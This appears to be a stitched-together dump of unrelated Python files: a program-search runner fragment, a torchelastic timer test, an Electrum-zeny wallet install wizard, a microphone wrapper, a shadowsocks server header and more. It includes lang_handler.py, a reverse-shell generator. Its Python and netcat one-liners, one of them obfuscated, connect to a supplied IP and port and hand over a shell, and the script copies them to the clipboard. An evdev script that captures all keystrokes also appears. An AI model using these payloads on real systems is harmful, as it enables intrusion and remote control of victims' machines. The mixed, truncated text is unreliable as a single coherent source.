# queue[0] = best_prog
queue['prog'] = best_prog
dbg(f'BEST_PROG size:{best_prog_size} errors:{best_prog_errors}')
for x in best_prog:
dbg('\t'+ x.to_code())
if settings.optimistic and best_prog_errors == 0:
break
# if the chunk_size is >= the number of pos examples, stop
if chunk_size >= len(all_chunks):
break
# double the chunk size (so the loop runs for at most log(len(pos)) iterations)
chunk_size += chunk_size
# queue.put(best_prog)
dbg(f'best_prog size:{best_prog_size} errors:{best_prog_errors}')
if best_prog:
for x in best_prog:
dbg('\t'+ x.to_code())
return
from multiprocessing import Process, Queue
# def runner(settings):
# # queue = Queue()
# stats = Stats()
# if settings.baseline:
# p = multiprocessing.Process(target = standard_popper, args = (settings, stats, queue))
# else:
# p = multiprocessing.Process(target = split_search, args = (settings, stats, queue))
# p.start()
# p.join(int(settings.timeout))
# if p.is_alive():
# p.terminate()
# prog = None
# i=1
# while queue.empty() == False:
# prog = queue.get()
# print(i)
# if prog != None:
# for x in prog:
# dbg('\t'+ x.to_code())
# i+=1
# return prog
def runner(settings):
with multiprocessing.Manager() as manager:
# l = manager.list(range(1))
l = manager.dict()
l['prog'] = None
stats = Stats()
if settings.baseline:
p = multiprocessing.Process(target = standard_popper, args = (settings, stats, l))
else:
p = multiprocessing.Process(target = split_search, args = (settings, stats, l))
p.start()
p.join(int(settings.timeout))
if p.is_alive():
p.terminate()
return l['prog']
if __name__ == '__main__':
settings = Settings()
runner(settings)
|
local_timer_example.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import logging
import multiprocessing as mp
import signal
import time
import unittest
import torch.multiprocessing as torch_mp
import torchelastic.timer as timer
from torchelastic.test.test_utils import is_asan_or_tsan, is_tsan
logging.basicConfig(
level=logging.INFO, format="[%(levelname)s] %(asctime)s %(module)s: %(message)s"
)
def _happy_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(0.5)
def _stuck_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(5)
class LocalTimerExample(unittest.TestCase):
"""
Demonstrates how to use LocalTimerServer and LocalTimerClient
to enforce expiration of code-blocks.
Since torch multiprocessing's ``start_process`` method currently
does not take the multiprocessing context as parameter argument
there is no way to create the mp.Queue in the correct
context BEFORE spawning child processes. Once the ``start_process``
API is changed in torch, then re-enable ``test_torch_mp_example``
unittest. As of now this will SIGSEGV.
"""
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_torch_mp_example(self):
# in practice set the max_interval to a larger value (e.g. 60 seconds)
mp_queue = mp.get_context("spawn").Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
# all processes should complete successfully
# since start_process does NOT take context as parameter argument yet
# this method WILL FAIL (hence the test is disabled)
torch_mp.spawn(
fn=_happy_function, args=(mp_queue,), nprocs=world_size, join=True
)
with self.assertRaises(Exception):
# torch.multiprocessing.spawn kills all sub-procs
# if one of them gets killed
torch_mp.spawn(
fn=_stuck_function, args=(mp_queue,), nprocs=world_size, join=True
)
server.stop()
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_spawn(self):
self._run_example_with(start_method="spawn")
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_forkserver(self):
self._run_example_with(start_method="forkserver")
@unittest.skipIf(is_tsan(), "test is tsan incompatible")
def test_example_start_method_fork(self):
self._run_example_with(start_method="fork")
def _run_example_with(self, start_method):
spawn_ctx = mp.get_context(start_method)
mp_queue = spawn_ctx.Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
processes = []
for i in range(0, world_size):
if i % 2 == 0:
p = spawn_ctx.Process(target=_stuck_function, args=(i, mp_queue))
else:
p = spawn_ctx.Process(target=_happy_function, args=(i, mp_queue))
p.start()
processes.append(p)
for i in range(0, world_size):
p = processes[i]
p.join()
if i % 2 == 0:
self.assertEqual(-signal.SIGKILL, p.exitcode)
else:
self.assertEqual(0, p.exitcode)
server.stop()
|
installwizard.py
|
import sys
import os
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
import electrum_zeny
from electrum_zeny import Wallet, WalletStorage
from electrum_zeny.util import UserCancelled, InvalidPassword
from electrum_zeny.base_wizard import BaseWizard
from electrum_zeny.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-zeny - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-zeny wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
global_key_listener.py
|
#!/usr/bin/env python
from evdev import InputDevice, list_devices, categorize, ecodes
import threading
def listen_for_events(dev):
for event in dev.read_loop():
if event.type == ecodes.EV_KEY:
print dev.name+" - "+dev.fn+": "+str(categorize(event))
print "This script grabs all the devices and doesn't allow keystrokes to pass through normally, effectively blocking you all the ways to stop this script by keyboard you're using (not mouse, thankfully)."
#TODO:Add a device selection to excluse one device that could to the Ctrl+C
raw_input("Press Enter to continue or Ctrl+C to exit")
devices = [InputDevice(fn) for fn in list_devices()]
for dev in devices:
print(dev.fn, dev.name, dev.phys)
thread = threading.Thread(target=listen_for_events, args=(dev,))
thread.daemon = False
thread.start()
|
microphone.py
|
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: microphone.py
# Authors: Chris Lovett
#
# Requires: Python 3.x
#
###################################################################################################
import audioop
import math
import sys
from threading import Thread, Lock, Condition
import numpy as np
import pyaudio
def list_devices():
audio = pyaudio.PyAudio()
print("Pick from available microphones:")
for i in range(audio.get_device_count()):
info = audio.get_device_info_by_index(i)
if info["maxInputChannels"] > 0:
print(" {}. {}".format(i, info["name"]))
class Microphone:
""" This class wraps the pyaudio library and it's input stream callback providing a simple to
use Microphone class that you can simply read from """
def __init__(self, auto_scale=True, console=True):
""" Create Microphone object.
console - specifies whether you are running from console app, if so this will listen for
stdin "x" so user can tell you app to close the microphone """
self.audio = pyaudio.PyAudio()
self.read_buffer = []
self.lock = Lock()
self.cv = Condition(self.lock)
self.closed = False
self.num_channels = 1
self.console = console
self.stdin_thread = None
self.input_stream = None
self.auto_scale = auto_scale
self.audio_scale_factor = 1
self.tail = None
def open(self, sample_size, sample_rate, num_channels, input_device=None):
""" Open the microphone so it returns chunks of audio samples of the given sample_size
where audio is converted to the expected sample_rate and num_channels
and then scaled to floating point numbers between -1 and 1.
sample_size - number of samples to return from read method
audio_scale_factor - audio is converted to floating point using this scale
sample_rate - the expected sample rate (e.g. 16000)
num_channels - the number of audio channels to return
input_device - input device index if you don't want to use the default
"""
self.sample_rate = sample_rate
self.sample_size = sample_size
self.num_channels = num_channels
self.audio_format = pyaudio.paInt16
self.cvstate = None
if input_device:
info = self.audio.get_device_info_by_index(input_device)
else:
info = self.audio.get_default_input_device_info()
self.mic_rate = int(info['defaultSampleRate'])
buffer_size = int(math.ceil(sample_size * self.mic_rate / sample_rate))
self.input_stream = self.audio.open(format=pyaudio.paInt16,
channels=num_channels,
rate=self.mic_rate,
input=True,
frames_per_buffer=buffer_size,
stream_callback=self._on_recording_callback,
input_device_index=input_device)
if self.auto_scale:
self.audio_scale_factor = 1 / 32768 # since we are using pyaudio.paInt16.
self.closed = False
if self.console:
# since our read call blocks the UI we use a separate thread to monitor user input
self.stdin_thread = Thread(target=self.monitor_input, args=(sys.stdin,))
self.stdin_thread.daemon = True
self.stdin_thread.start()
def _on_recording_callback(self, data, frame_count, time_info, status):
if self.mic_rate != self.sample_rate:
# convert the incoming audio to the desired recording rate
result, self.cvstate = audioop.ratecv(data, 2, self.num_channels, self.mic_rate, self.sample_rate,
self.cvstate)
else:
result = data
# protect access to the shared state
self.cv.acquire()
try:
self.read_buffer += [result]
if len(self.read_buffer) == 1:
self.cv.notify()
except:
pass
self.cv.release()
return (data, pyaudio.paContinue)
def read(self):
""" Read the next audio chunk. This method blocks until the audio is available """
while not self.closed:
result = None
# deal with any accumulation of tails, if the tail grows to a full
# buffer then return it!
if self.tail is not None and len(self.tail) >= self.sample_size:
data = self.tail[0:self.sample_size]
self.tail = self.tail[self.sample_size:]
return data
# block until microphone data is ready...
self.cv.acquire()
try:
while len(self.read_buffer) == 0:
if self.closed:
return None
self.cv.wait(0.1)
result = self.read_buffer.pop(0)
except:
pass
self.cv.release()
if result is not None:
# convert int16 data to scaled floats
data = np.frombuffer(result, dtype=np.int16)
data = data.astype(float)
if self.tail is not None:
# we have a tail from previous frame, so prepend it
data = np.concatenate((self.tail, data))
# now the caller needs us to stick to our sample_size contract, but when
# rate conversion happens we can't be sure that 'data' is exactly that size.
if len(data) > self.sample_size:
# usually one byte extra so add this to our accumulating tail
self.tail = data[self.sample_size:]
data = data[0:self.sample_size]
if len(data) < self.sample_size:
# might have reached the end of the stream.
zeros = np.zeros(self.sample_size - len(data))
data = np.concatenate((data, zeros))
return data * self.audio_scale_factor
return None
def close(self):
""" Close the microphone """
self.closed = True
if self.input_stream:
self.input_stream.close()
def is_closed(self):
""" return true if the microphone is closed """
return self.closed
def monitor_input(self, stream):
""" monitor stdin since our read call is blocking, this way user can type 'x' to quit """
try:
while not self.closed:
out = stream.readline()
if out:
msg = out.rstrip('\n')
if msg == "exit" or msg == "quit" or msg == "x":
print("closing microphone...")
self.closed = True
else:
break
except:
errorType, value, traceback = sys.exc_info()
msg = "### Exception: %s: %s" % (str(errorType), str(value))
self.print(msg)
|
lang_handler.py
|
from simple_term_menu import TerminalMenu
import pyperclip
languages = {
"python": ["python", "py", "py3"],
"netcat": ["nc", "netcat"],
"bash": ["sh", "bash"],
"php": ["php"],
"ruby": ["ruby"],
}
def lang_handler(lang, option):
for key, values in languages.items():
for value in values:
if lang in value:
if key == "python":
rs = python(option)
return rs
elif key == "netcat":
rs = netcat(option)
return rs
elif key == "bash":
rs = bash(option)
return rs
elif key == "php":
rs = php(option)
return rs
elif key == "ruby":
rs = ruby(option)
return rs
else:
raise NotImplementedError
def python(option=""):
python_rs = [
r'''export RHOST="{}";export RPORT={};python -c \'import socket,os,pty;s=
socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[
os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'''',
r"""C:\Python27\python.exe -c \"(lambda __y, __g, __contextlib: [[[[[[[
(s.connect(('{}', {})), [[[(s2p_thread.start(), [[(p2s_thr
ead.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__
(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except',
(), {{'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value
, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt)
and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])}})(),
type('try', (), {{'__enter__': lambda self: None, '__exit__': lambda __self, __
exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __
after: __after()))[1])]][0]}})())))([None]))[1] for p2s_thread.daemon in [(True)]]
[0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1]
for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread
(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32
\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]]
[0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for
__g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda
__this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __
after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({{}}), 'p2s')]][0]
for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y
(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after(
))[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in
[(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'],
__l['p'] in [(s, p)]][0])({{}}), 's2p')]][0] for __g['os'] in [(__import__('os', __
g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __
g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading']
in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y
: f(lambda: y(y)()))), globals(), __import__('contextlib'))\"""",
'''python -c \'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);
s.connect(("{}",{},0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'''',
]
if option is True:
rs = python_rs[0]
else:
options_python_rs = [
"Generic Python Reverse Shell",
"Windows Only Python Reverse Shell",
"IPV6 Reverse Shell",
]
terminal_menu_lang = TerminalMenu(
options_python_rs, title="Python Reverse Shell"
)
option = terminal_menu_lang.show()
rs = python_rs[option]
return rs
def netcat(option=""):
netcat_rs = [
"nc -e /bin/sh {} {}",
"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f",
"rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f",
]
if option is True:
rs = netcat_rs[0]
else:
options_netcat_rs = [
"Basic Netcat Reverse Shell",
"Netcat OpenBsd Reverse Shell",
"Netcat BusyBox Reverse Shell",
]
terminal_menu_lang = TerminalMenu(
options_netcat_rs, title="Netcat Reverse Shell"
)
option = terminal_menu_lang.show()
rs = netcat_rs[option]
return rs
def bash(option=""):
pass
def php(option=""):
pass
def ruby(option=""):
pass
# This function will put the reverse shell into the clipboard of the system.
def provide_rs(rs, ip, port):
print("Reverse Shell is now in clipboard.")
pyperclip.copy(f"{rs.format(ip,port)}")
|
ssserver.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014 clowwindy
# Copyright (c) 2014 v3aqb
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import with_statement
__version__ = '1.0.0'
import sys
if sys.version_info < (2, 6):
import simplejson as json
else:
import json
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import select
import socket
import threading
import SocketServer
import struct
import logging
import getopt
import encrypt
import os
import urlparse
